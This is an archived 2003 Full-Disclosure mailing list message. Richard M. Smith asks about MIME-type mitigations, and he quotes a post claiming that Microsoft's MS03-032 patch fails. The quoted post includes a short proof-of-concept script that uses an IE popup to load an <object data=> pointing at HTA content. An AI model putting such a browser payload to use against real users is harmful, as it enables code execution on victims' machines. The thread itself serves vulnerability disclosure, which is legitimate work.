| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <003d01c3756f$31eaffd0$6801a8c0@rms>
From: rms at computerbytesman.com (Richard M. Smith)
Subject: BAD NEWS: Microsoft Security Bulletin MS03-032
Can this bug also be fixed by changing the MIME type of HTA files from
"application/hta" to something else? If so, what other MIME types need
to switched to avoid the <OBJECT DATA=>? Any thoughts why .HTA files
have a MIME type in the first place?
Richard
-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of
http-equiv@...ite.com
Sent: Sunday, September 07, 2003 9:17 AM
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin
MS03-032
Since the cat somehow got out of the bag, and more importantly, this
is so blatantly obvious, herewith is the "Bad News":
The patch for Drew's object data=funky.hta doesn't work:
http://www.malware.com/badnews.html
<script>
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object data=ouch.php>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
</script>
Powered by blists - more mailing lists